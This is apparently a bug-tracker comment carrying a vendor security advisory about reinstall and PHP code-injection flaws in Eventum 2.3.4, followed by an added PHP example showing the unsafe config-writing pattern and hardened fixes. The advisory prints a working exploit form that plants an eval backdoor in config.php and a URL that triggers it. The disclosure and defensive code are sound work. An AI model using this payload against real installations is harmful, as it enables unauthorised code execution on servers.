Comment 1 for bug 1271499

htbridge (advisory) wrote:

Hello,

High-Tech Bridge Security Research Lab has discovered multiple security vulnerabilities in your product - Eventum.

A detailed description and all available details of the vulnerabilities are provided below in the email.

Please notify us by replying to this email when you release a security update, and if possible provide us with the URL of the patch/solution so we can add this URL to the advisory.

If you need more time to fix the vulnerabilities, please specify the desired Public Disclosure date by replying to this email.

For any questions related to this notification email, please visit our General Information & Disclosure Policy page: https://www.htbridge.com/advisory/disclosure_policy.html

If you don't find an answer to your question there, please feel free to contact us by email: <email address hidden>

===============================================================

Advisory ID: HTB23198
Reference: https://www.htbridge.com/advisory/HTB23198
Product: Eventum
Vendor: Eventum Development Team
Vulnerable Version(s): 2.3.4 and probably prior
Tested Version: 2.3.4
Public Disclosure: February 12, 2014
Vulnerability Type: Incorrect Default Permissions [CWE-276], Code Injection [CWE-94]
Risk Level: Critical
CVSSv2 Base Scores: 6.4 (AV:N/AC:L/Au:N/C:N/I:P/A:P), 10 (AV:N/AC:L/Au:N/C:C/I:C/A:C)
Discovered and Provided: High-Tech Bridge Security Research Lab ( https://www.htbridge.com/advisory/ )

Advisory Details:

High-Tech Bridge Security Research Lab discovered a vulnerability in Eventum, which can be exploited to reinstall and compromise the vulnerable application.

1) Incorrect Default Permissions in Eventum

The vulnerability exists due to an incorrect default permission set for installation scripts. Access to the installation script located at "/setup/index.php" is not restricted by default, and the script is not deleted during the installation process. A remote attacker can access the script and reinstall the vulnerable application.

The installation script can be accessed by a remote unauthenticated user via the following URL:

http://[host]/setup/index.php

2) Code Injection in Eventum

The vulnerability exists due to insufficient sanitization of the HTTP POST parameter "hostname" in the "/config/config.php" script during the installation process. A remote attacker can inject and execute arbitrary PHP code on the target system with the privileges of the webserver. Successful exploitation requires access to the application's database, which can be achieved by providing the address of an attacker-controlled MySQL server.

The following exploitation example injects a backdoor into the "/config/config.php" file:

<form action="http://[host]/setup/index.php" method="post" name="main">
<input type="hidden" name="cat" value="install">
<input type="hidden" name="hostname" value="'); eval($_GET['cmd']); $tmp=('">
<input type="hidden" name="relative" value="/">
<input type="hidden" name="db_hostname" value="db_hostname">
<input type="hidden" name="db_name" value="db_name">
<input type="hidden" name="db_table_prefix" value="db_table_prefix">
<input type="hidden" name="drop_tables" value="yes">
<input type="hidden" name="db_username" value="db_username">
<input type="hidden" name="setup[smtp][from]" <email address hidden>">
<input type="hidden" name="setup[smtp][host]" value="localhost">
<input type="hidden" name="setup[smtp][port]" value="25">
<input type="hidden" name="" value="">
<input type="submit" id="btn">
</form>

After a successful reinstallation an attacker can execute arbitrary PHP code on the system. The following example executes the "phpinfo()" PHP function on the vulnerable system:

http://[host]/index.php?cmd=phpinfo%28%29;

===============================================================

Best regards,

High-Tech Bridge Security Research Lab
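The two defects the advisory describes, an installer that stays reachable after setup and a request parameter concatenated into PHP source, are illustrated below in an added example that is not Eventum's own code and not part of the advisory. The function names (`render_config_unsafe`, `render_config_safe`, `validate_hostname`, `installer_allowed`) and the sample inputs are constructed for this illustration; the unsafe renderer only reproduces the general shape of the bug class, not Eventum's actual installer code.

```php
<?php
// Added example (not Eventum project code). Shows why writing a request
// parameter into a PHP config file by string concatenation is dangerous,
// and how to emit the value safely instead.

declare(strict_types=1);

// Hypothetical vulnerable pattern: the value lands inside PHP source
// unescaped, so a quote in the value closes the literal and whatever
// follows is parsed and executed as code when the config file is loaded.
function render_config_unsafe(string $hostname): string
{
    return "<?php\n\$app_hostname = ('" . $hostname . "');\n";
}

// Hardened step 1: accept only values that look like a hostname.
// FILTER_FLAG_HOSTNAME restricts the input to RFC 1123 label syntax.
function validate_hostname(string $hostname): string
{
    $hostname = trim($hostname);
    if ($hostname === '' || strlen($hostname) > 253) {
        throw new InvalidArgumentException('hostname length out of range');
    }
    if (filter_var($hostname, FILTER_VALIDATE_DOMAIN, FILTER_FLAG_HOSTNAME) === false) {
        throw new InvalidArgumentException('hostname contains invalid characters');
    }
    return $hostname;
}

// Hardened step 2: never build PHP source by hand. var_export() produces a
// correctly quoted and escaped PHP literal for any string, so even a value
// that slipped past validation would remain inert data.
function render_config_safe(string $hostname): string
{
    $hostname = validate_hostname($hostname);
    return "<?php\n\$app_hostname = " . var_export($hostname, true) . ";\n";
}

// Mitigation for the first issue in the advisory: the installer must refuse
// to run once a configuration already exists, instead of silently allowing
// a reinstall. Deleting or access-restricting the setup directory after
// installation is the complementary operational control.
function installer_allowed(string $configPath): bool
{
    return !file_exists($configPath);
}

// Constructed sample inputs (not taken from any real installation).
$benign  = 'tracker.example.com';
$hostile = "'); phpinfo(); \$x=('";   // same shape as the advisory's payload

echo "UNSAFE, benign input:\n", render_config_unsafe($benign), "\n";
echo "UNSAFE, hostile input (note the statement that now sits outside the literal):\n",
     render_config_unsafe($hostile), "\n";

echo "SAFE, benign input:\n", render_config_safe($benign), "\n";
try {
    render_config_safe($hostile);
} catch (InvalidArgumentException $e) {
    echo "SAFE, hostile input: rejected (", $e->getMessage(), ")\n\n";
}

// Defence in depth: var_export() alone keeps the hostile value as a string.
echo "var_export only: \$app_hostname = ", var_export($hostile, true), ";\n\n";

// Installer guard: a config file that already exists blocks a re-run.
$configPath = sys_get_temp_dir() . '/example_config.php';
echo "installer allowed before setup: ", var_export(installer_allowed($configPath), true), "\n";
file_put_contents($configPath, render_config_safe($benign));
echo "installer allowed after setup:  ", var_export(installer_allowed($configPath), true), "\n";
unlink($configPath);
```

Run with `php example.php`. The unsafe renderer prints `$app_hostname = (''); phpinfo(); $x=('');`, which is exactly the kind of line the advisory describes being written into config.php, whereas the safe path either rejects the value outright or, via `var_export()`, emits it as `'\'); phpinfo(); $x=(\''`, a harmless string. The `installer_allowed()` guard is the minimal code-level fix for the first finding; restricting or removing `/setup/` in the web server configuration is still needed because a guard inside the script does nothing if the script itself can be bypassed or replaced.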